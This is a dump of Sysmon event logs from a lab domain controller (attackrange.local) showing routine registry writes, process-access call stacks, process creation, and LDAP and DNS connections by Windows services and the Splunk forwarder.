12:02:12.914{266CAFBE-646A-6064-0A00-00000000AE01}840C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\LanmanServer\Parameters\requiresecuritysignatureDWORD (0x00000001) 13241300x80000000000000004564Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:02:12.914{266CAFBE-646A-6064-0A00-00000000AE01}840C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\LanmanServer\Parameters\enablesecuritysignatureDWORD (0x00000001) 13241300x80000000000000004563Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.localT1101SetValue2021-03-31 12:02:12.914{266CAFBE-646A-6064-0A00-00000000AE01}840C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Control\Lsa\nolmhashDWORD (0x00000001) 10341000x80000000000000004562Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:12.899{266CAFBE-64C4-6064-A100-00000000AE01}29803484C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{266CAFBE-647D-6064-2F00-00000000AE01}2796C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004561Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:12.867{266CAFBE-646C-6064-1000-00000000AE01}11242368C:\Windows\system32\svchost.exe{266CAFBE-64C4-6064-A200-00000000AE01}3108C:\Windows\system32\userinit.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004560Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:12.867{266CAFBE-646C-6064-1000-00000000AE01}11241624C:\Windows\system32\svchost.exe{266CAFBE-64C4-6064-A200-00000000AE01}3108C:\Windows\system32\userinit.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004559Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:12.805{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000004558Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:12.743{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004557Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:12.743{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004556Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:12.743{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004555Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:12.743{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004554Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:12.743{266CAFBE-64C1-6064-9100-00000000AE01}51084328C:\Windows\system32\csrss.exe{266CAFBE-64C4-6064-A200-00000000AE01}3108C:\Windows\system32\userinit.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000004553Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:12.743{266CAFBE-64C1-6064-9200-00000000AE01}2552876C:\Windows\system32\winlogon.exe{266CAFBE-64C4-6064-A200-00000000AE01}3108C:\Windows\system32\userinit.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|C:\Windows\system32\winlogon.exe+15b13|C:\Windows\system32\winlogon.exe+ea76|C:\Windows\system32\winlogon.exe+b12f|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000004552Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:12.745{266CAFBE-64C4-6064-A200-00000000AE01}3108C:\Windows\System32\userinit.exe10.0.14393.0 (rs1_release.160715-1616)Userinit Logon ApplicationMicrosoft® Windows® Operating SystemMicrosoft CorporationUSERINIT.EXEC:\Windows\system32\userinit.exeC:\Windows\system32\ATTACKRANGE\Administrator{266CAFBE-64C3-6064-2804-0B0000000000}0xb04282HighMD5=C1B1FFC800BE2F31EB2CF8CB40629C69,SHA256=CFC6A18FC8FE7447ECD491345A32F0F10208F114B70A0E9D1CD72F6070D5B36F,IMPHASH=BFA137B16F3492AFCA0551687B067C04{266CAFBE-64C1-6064-9200-00000000AE01}2552C:\Windows\System32\winlogon.exewinlogon.exe 10341000x80000000000000004551Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:12.727{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004550Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:12.696{266CAFBE-647E-6064-3D00-00000000AE01}37963816C:\Windows\system32\conhost.exe{266CAFBE-64C4-6064-A100-00000000AE01}2980C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004549Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:12.696{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004548Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:12.696{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004547Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:12.696{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004546Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:12.696{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004545Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:12.696{266CAFBE-6469-6064-0500-00000000AE01}624740C:\Windows\system32\csrss.exe{266CAFBE-64C4-6064-A100-00000000AE01}2980C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000004544Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:12.696{266CAFBE-647D-6064-2F00-00000000AE01}27964104C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{266CAFBE-64C4-6064-A100-00000000AE01}2980C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000004543Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:12.557{266CAFBE-64C4-6064-A100-00000000AE01}2980C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{266CAFBE-647D-6064-2F00-00000000AE01}2796C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x80000000000000004542Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:11.713{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetruefe80:0:0:0:8c4d:e56a:c9ce:fd2bwin-dc-892.attackrange.local53569-truefe80:0:0:0:8c4d:e56a:c9ce:fd2bwin-dc-892.attackrange.local389ldap 354300x80000000000000004541Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:11.713{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\System32\svchost.exeNT AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:8c4d:e56a:c9ce:fd2bwin-dc-892.attackrange.local53569-truefe80:0:0:0:8c4d:e56a:c9ce:fd2bwin-dc-892.attackrange.local389ldap 23542300x80000000000000004540Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:12.618{266CAFBE-646C-6064-1000-00000000AE01}1124NT AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\Windows\security\templates\policies\tmpgptfl.infMD5=F443C7B00E42C58336E9113C4B92A1EA,SHA256=01406B7BD612A8321213382482E44EA2C7B5467B57E17E9C135EAB2A8221FAEA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000004539Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:12.618{266CAFBE-646C-6064-1000-00000000AE01}1124NT AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\Windows\security\templates\policies\tmpgptfl.infMD5=26FFB2926F32F78EAEF80D8A870A88C6,SHA256=BA4E44773C9233D16C9950097A1D1FEF3AB2E8376120959E529DC97EF1871D7C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000004538Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:12.618{266CAFBE-646C-6064-1000-00000000AE01}1124NT AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\Windows\security\templates\policies\gpt00001.infMD5=DBBF697C05F302D06DD05403297DB608,SHA256=632CAD193E30E450B7753E6D16643B576DFABAA1FA60E8D29DA7665946810599,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000004537Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:12.603{266CAFBE-646C-6064-1000-00000000AE01}1124NT AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\Windows\security\templates\policies\gpt00000.domMD5=338F5A9E4E606FC803055C8314E3F366,SHA256=DD15D6AD575AD10CBA979783EE68DC6A5A21ECDABDB4E0678F83870931BBD317,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000004536Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:12.572{266CAFBE-646A-6064-0B00-00000000AE01}856888C:\Windows\system32\lsass.exe{266CAFBE-6467-6064-0100-00000000AE01}4System0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\kerberos.DLL+96fe2|C:\Windows\system32\kerberos.DLL+794d4|C:\Windows\system32\kerberos.DLL+144c9|C:\Windows\system32\lsasrv.dll+2d231|C:\Windows\system32\lsasrv.dll+2b3f4|C:\Windows\system32\lsasrv.dll+304a5|C:\Windows\system32\lsasrv.dll+2e33b|C:\Windows\system32\lsasrv.dll+2d231|C:\Windows\system32\lsasrv.dll+15e0d|C:\Windows\SYSTEM32\SspiSrv.dll+1a96|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 10341000x80000000000000004535Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:12.572{266CAFBE-646A-6064-0B00-00000000AE01}856888C:\Windows\system32\lsass.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004534Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:12.572{266CAFBE-646A-6064-0B00-00000000AE01}856888C:\Windows\system32\lsass.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 13241300x80000000000000004533Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.localT1031,T1050SetValue2021-03-31 12:02:12.463{266CAFBE-646A-6064-0A00-00000000AE01}840C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\EFS\StartDWORD (0x00000003) 23542300x80000000000000004532Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:12.447{266CAFBE-648B-6064-7A00-00000000AE01}4692NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=7E5AE8C0B08F177685A5777D0683C308,SHA256=CB66257DF5D01951F623B3469253D1F18A3C902B3A7F28A040D1FD492324854B,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000004531Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:11.264{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-892.attackrange.local53domainfalse10.0.1.14win-dc-892.attackrange.local56991- 354300x80000000000000004530Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:11.264{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local62977- 10341000x80000000000000004529Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 